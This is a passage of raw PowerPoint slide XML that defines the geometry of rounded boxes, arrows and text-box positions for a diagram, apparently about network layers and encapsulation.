                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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3" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B998647-8559-8D75-1D8C-569A6375C0ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6243065" y="1317497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4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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EDB7B7-0B2D-F71D-C5F5-9304AE41263D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403791" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8917DB75-FCB4-81D4-DA1E-5292689BF69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994213" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E64EF6-936D-389C-F635-A01BB130BCBE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927100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645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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1" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6551C2-C51B-3946-304C-1D848F669C8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973061" y="1317497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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654F117D-1765-168F-EC82-AEA776C67926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136454" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E7157DA-DC36-B2F5-002B-F8E62843040D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5567749" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9352FC-5C2B-407C-8970-69493B9D0DC0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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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9" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C137B0F-62AD-1C93-2EC7-976CDDD89041}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5546597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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68EBB4F1-1F5E-08B0-87DE-42D551C696A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706053" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E29A496B-53CE-9DEE-AF1B-62C4E0DD7D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824037" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7322A48-6DD9-A951-DFF3-908BA07BF541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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7" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE30CDE8-172B-2E3F-FEFD-50367087C55F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6824B26-9865-E919-AAD0-4EC232181E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963230" y="3170608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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE4C25B-BDFE-9007-D7FA-FE4A706FB1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033081" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4011929" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F16DB51-1738-F1AD-893E-B8693BB06137}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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730D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5" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81C869C-B3C6-58BB-AE0E-EF6A51090DCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145CC901-21F6-E46B-06D9-BCA0BAB9DDF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171130" y="4073704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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075FAD7B-6961-E16C-6F58-0D9F0E6F41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225361" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52930B58-07C9-F4E3-3BC9-28E62B35EB09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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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3" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46386BD-3F71-C2DA-DDD2-6BD57A1D4F60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3204209" y="1355598"/>
              <a:ext cx="576580" cy="3278504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="576579" h="3278504">
                  <a:moveTo>
                    <a:pt x="0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8171D48F-7661-F238-3F0C-9C664ADAB983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440373" y="1609142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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE46163-8563-D8FD-58F0-F20F5884F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440373" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6057D0B-3326-5D9A-ED45-45DC1563EFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429197" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2584B9-8C50-2E67-20C7-9AB2DFBC3326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8121974" y="1290626"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360169"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C92E3BD-9BEE-8354-F2F3-85BCB5AA47A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360169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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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1" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B61F40-CC82-E597-E572-CD37B2D6CF07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360169"/>
              <a:ext cx="576580" cy="3276600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="576579" h="3276600">
                  <a:moveTo>
                    <a:pt x="0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25908">
              <a:solidFill>
                <a:srgbClr val="9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8" name="object 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2A2464-4432-20F5-E96F-053ADD8171BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA2185E-5F4C-2267-5A05-807BBA6AB55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="3929839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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3211066B-F05E-C1A9-7AC9-73FF830EDED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="4173679"/>
            <a:ext cx="106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51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81086477-0A67-D267-302B-4A251C7CF180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6297746" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="6276594" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="object 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4E3689-837A-91BC-DCAA-F8DE7D4F194D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6276594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4" h="772794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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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9" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14107D0-AE97-B936-234A-4323CFE886B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6276594" y="21572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4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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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2" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD3CD05-1D3E-9146-F73D-ADB59A028F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6437318" y="2331519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3" name="object 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58175C90-0701-0A10-1D0F-26CBE23CE1B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6995738" y="2087679"/>
            <a:ext cx="1056640" cy="772795"/>
            <a:chOff x="6974586" y="2157222"/>
            <a:chExt cx="1056640" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="object 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136AE277-E502-9A88-6073-EE4E1C31C3D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6974586" y="2157222"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
